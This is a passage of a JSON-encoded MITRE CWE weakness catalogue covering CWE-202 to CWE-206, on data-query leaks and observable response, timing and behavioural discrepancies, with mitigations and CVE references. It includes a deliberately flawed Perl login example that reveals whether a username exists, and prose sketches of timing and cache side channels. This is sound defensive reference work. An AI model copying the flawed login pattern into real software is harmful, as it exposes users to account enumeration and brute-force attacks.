number of users should be able to make queries that \\"scrub\\" the identity of users, it may be possible to get information about a user -- e.g., by specifying search terms that are known to be unique to that user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1230","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Application Data"],"Note":"Sensitive information may possibly be leaked through data queries accidentally."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"This is a complex topic. See the book Translucent Databases for a good discussion of best practices."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"See the book Translucent Databases for examples."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Accidental leaking of sensitive information through data queries"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":"The relationship between CWE-202 and CWE-612 needs to be investigated more closely, as they may be different descriptions of the same kind of problem. CWE-202 is also being considered for deprecation, as it is not clearly described and may have been misunderstood by CWE users. It could be argued that this issue is better covered by CAPEC; an attacker can utilize their data-query privileges to perform this kind of operation, and if the attacker should not be allowed to perform the operation - or if the sensitive data should not have been made accessible at all - then that is more appropriately classified as a separate CWE related to authorization (see the parent, CWE-1230)."}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Maintenance_Notes, Name, References, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Data Queries","attr":{"@_Date":"2008-04-11"}},{"#text":"Privacy Leak through Data Queries","attr":{"@_Date":"2011-03-29"}},{"#text":"Exposure of Sensitive Data Through Data Queries","attr":{"@_Date":"2020-02-24"}}]}},"203":{"attr":{"@_ID":"203","@_Name":"Observable Discrepancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not.","Extended_Description":"Discrepancies can take many forms, and variations may be detectable in timing, control flow, communications such as replies or requests, or general behavior. These discrepancies can reveal information about the product\'s operation or internal state to an unauthorized actor. In some cases, discrepancies can be used by attackers to form a side channel.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Side Channel Attack","Description":"Observable Discrepancies are at the root of side channel attacks."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"],"Note":"An attacker can gain access to sensitive information about the system, including authentication information that may allow an attacker to gain access to the system."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"When cryptographic primitives are vulnerable to side-channel-attacks, this could be used to reveal unencrypted plaintext in the worst case."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-38"},"Intro_Text":"The following code checks validity of the supplied username and password and notifies the user of a successful or failed login.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $username=param(\'username\');my $password=param(\'password\');if (IsValidUsername($username) == 1){}else{}","xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"if (IsValidPassword($username, $password) == 1){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"print \\"Login Successful\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"Login Failed - incorrect password\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"print \\"Login Failed - unknown username\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"result"},"xhtml:div":"\\"Login Failed - incorrect username or password\\""}],"Body_Text":["In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials.","While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as:"]},{"Intro_Text":"Non-uniform processing time causes timing channel.","Example_Code":[{"#text":"Suppose an algorithm for implementing an encryption routine works fine per se, but the time taken to output the result of the encryption routine depends on a relationship between the input plaintext and the key (e.g., suppose, if the plaintext is similar to the key, it would run very fast).","attr":{"@_Nature":"bad"}},{"#text":"Artificial delays may be added to ensured all calculations take equal time to execute.","attr":{"@_Nature":"good"}}],"Body_Text":"In the example above, an attacker may vary the inputs, then observe differences between processing times (since different plaintexts take different time). This could be used to infer information about the key."},{"Intro_Text":"Suppose memory access patterns for an encryption routine are dependent on the secret key.","Body_Text":"An attacker can recover the key by knowing if specific memory locations have been accessed or not. The value stored at those memory locations is irrelevant. The encryption routine\'s memory accesses will affect the state of the processor cache. If cache resources are shared across contexts, after the encryption routine completes, an attacker in different execution context can discover which memory locations the routine accessed by measuring the time it takes for their own memory accesses to complete."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-8695","Description":"Observable discrepancy in the RAPL interface for some Intel processors allows information disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8695"},{"Reference":"CVE-2002-2094","Description":"This, and others, use \\"..\\" attacks and monitor error responses, so there is overlap with directory traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2094"},{"Reference":"CVE-2001-1483","Description":"Enumeration of valid usernames based on inconsistent responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1483"},{"Reference":"CVE-2001-1528","Description":"Account number enumeration via inconsistent responses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1528"},{"Reference":"CVE-2004-2150","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2150"},{"Reference":"CVE-2005-1650","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1650"},{"Reference":"CVE-2004-0294","Description":"Bulletin Board displays different error messages when a user exists or not, which makes it easier for remote attackers to identify valid users and conduct a brute force password guessing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0294"},{"Reference":"CVE-2004-0243","Description":"Operating System, when direct remote login is disabled, displays a different message if the password is correct, which allows remote attackers to guess the password via brute force methods.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0243"},{"Reference":"CVE-2002-0514","Description":"Product allows remote attackers to determine if a port is being filtered because the response packet TTL is different than the default TTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0514"},{"Reference":"CVE-2002-0515","Description":"Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0515"},{"Reference":"CVE-2002-0208","Description":"Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0208"},{"Reference":"CVE-2004-2252","Description":"Behavioral infoleak by responding to SYN-FIN packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2252"},{"Reference":"CVE-2001-1387","Description":"Product may generate different responses than specified by the administrator, possibly leading to an information leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1387"},{"Reference":"CVE-2004-0778","Description":"Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0778"},{"Reference":"CVE-2004-1428","Description":"FTP server generates an error message if the user name does not exist instead of prompting for a password, which allows remote attackers to determine valid usernames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1428"},{"Reference":"CVE-2003-0078","Description":"SSL implementation does not perform a MAC computation if an incorrect block cipher padding is used, which causes an information leak (timing discrepancy) that may make it easier to launch cryptographic attacks that rely on distinguishing between padding and MAC verification errors, possibly leading to extraction of the original plaintext, aka the \\"Vaudenay timing attack.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0078"},{"Reference":"CVE-2000-1117","Description":"Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1117"},{"Reference":"CVE-2003-0637","Description":"Product uses a shorter timeout for a non-existent user than a valid user, which makes it easier for remote attackers to guess usernames and conduct brute force password guessing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0637"},{"Reference":"CVE-2003-0190","Description":"Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190"},{"Reference":"CVE-2004-1602","Description":"FTP server responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1602"},{"Reference":"CVE-2005-0918","Description":"Browser allows remote attackers to determine the existence of arbitrary files by setting the src property to the target filename and using Javascript to determine if the web page immediately stops loading, which indicates whether the file exists or not.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0918"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Discrepancy Information Leaks"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A6","Entry_Name":"Information Leakage and Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"189"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Nicole Fern","Contribution_Organization":"Tortuga Logic","Contribution_Date":"2020-06-03","Contribution_Comment":"Provided Demonstrative Example for cache timing attack"},"Previous_Entry_Name":[{"#text":"Discrepancy Information Leaks","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure Through Discrepancy","attr":{"@_Date":"2020-02-24"}},{"#text":"Observable Discrepancy","attr":{"@_Date":"2020-08-20"}},{"#text":"Observable Differences in Behavior to Error Inputs","attr":{"@_Date":"2020-12-10"}}]}},"204":{"attr":{"@_ID":"204","@_Name":"Observable Response Discrepancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor outside of the intended control sphere.","Extended_Description":"This issue frequently occurs during authentication, where a difference in failed-login messages could allow an attacker to determine if the username is valid or not. These exposures can be inadvertent (bug) or intentional (design).","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-38"},"Intro_Text":"The following code checks validity of the supplied username and password and notifies the user of a successful or failed login.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $username=param(\'username\');my $password=param(\'password\');if (IsValidUsername($username) == 1){}else{}","xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"if (IsValidPassword($username, $password) == 1){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"print \\"Login Successful\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"Login Failed - incorrect password\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"print \\"Login Failed - unknown username\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"result"},"xhtml:div":"\\"Login Failed - incorrect username or password\\""}],"Body_Text":["In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials.","While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as:"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2094","Description":"This, and others, use \\"..\\" attacks and monitor error responses, so there is overlap with directory traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2094"},{"Reference":"CVE-2001-1483","Description":"Enumeration of valid usernames based on inconsistent responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1483"},{"Reference":"CVE-2001-1528","Description":"Account number enumeration via inconsistent responses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1528"},{"Reference":"CVE-2004-2150","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2150"},{"Reference":"CVE-2005-1650","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1650"},{"Reference":"CVE-2004-0294","Description":"Bulletin Board displays different error messages when a user exists or not, which makes it easier for remote attackers to identify valid users and conduct a brute force password guessing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0294"},{"Reference":"CVE-2004-0243","Description":"Operating System, when direct remote login is disabled, displays a different message if the password is correct, which allows remote attackers to guess the password via brute force methods.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0243"},{"Reference":"CVE-2002-0514","Description":"Product allows remote attackers to determine if a port is being filtered because the response packet TTL is different than the default TTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0514"},{"Reference":"CVE-2002-0515","Description":"Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0515"},{"Reference":"CVE-2001-1387","Description":"Product may generate different responses than specified by the administrator, possibly leading to an information leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1387"},{"Reference":"CVE-2004-0778","Description":"Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0778"},{"Reference":"CVE-2004-1428","Description":"FTP server generates an error message if the user name does not exist instead of prompting for a password, which allows remote attackers to determine valid usernames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1428"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Response discrepancy infoleak"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 12: Information Leakage." Page 191"}}},"Notes":{"Note":{"#text":"can overlap errors related to escalated privileges","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Name, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Response Discrepancy Information Leak","attr":{"@_Date":"2010-09-27"}},{"#text":"Response Discrepancy Information Exposure","attr":{"@_Date":"2020-02-24"}}]}},"205":{"attr":{"@_ID":"205","@_Name":"Observable Behavioral Discrepancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s behaviors indicate important differences that may be observed by unauthorized actors in a way that reveals (1) its internal state or decision process, or (2) differences from other products with equivalent functionality.","Extended_Description":"Ideally, a product should provide as little information about its internal operations as possible. Otherwise, attackers could use knowledge of these internal operations to simplify or optimize their attack. In some cases, behavioral discrepancies can be used by attackers to form a side channel.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"514","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0208","Description":"Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0208"},{"Reference":"CVE-2004-2252","Description":"Behavioral infoleak by responding to SYN-FIN packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2252"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Behavioral Discrepancy Infoleak"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":45,"Entry_Name":"Fingerprinting"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Behavioral Discrepancy Information Leak","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure Through Behavioral Discrepancy","attr":{"@_Date":"2020-02-24"}}]}},"206":{"attr":{"@_ID":"206","@_Name":"Observable Internal Behavioral Discrepancy","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product performs multiple behaviors that are combined to produce a single result, but the individual behaviors are observable separately in a way that allows attackers to reveal internal state or internal decision points.","Extended_Description":"Ideally, a product should provide as little information as possible to an attacker. Any hints that the attacker may be making progress can then be used to simplify or optimize the attack. For example, in a login procedure that requires a username and password, ultimately there is only one decision: success or failure. However, internally, two separate actions are performed: determining if the username exists, and checking if the password is correct. If the product behaves differently based on whether the username exists or not, then the attacker only needs to concentrate on the password.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"205","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Description":"Setup generic response pages for error conditions. The error page should not disclose information about the success or failure of a sensitive operation. For instance, the login page should not confirm that the login is correct and the password incorrect. The attacker who tries random account name may be able to guess some of them. Confirming that the account exists would make the login page more susceptible to brute force attack."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2031","Description":"File existence via infoleak monitoring whether \\"onerror\\" handler fires or not.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2031"},{"Reference":"CVE-2005-2025","Description":"Valid groupname enumeration via behavioral infoleak (sends response if valid, doesn\'t respond if 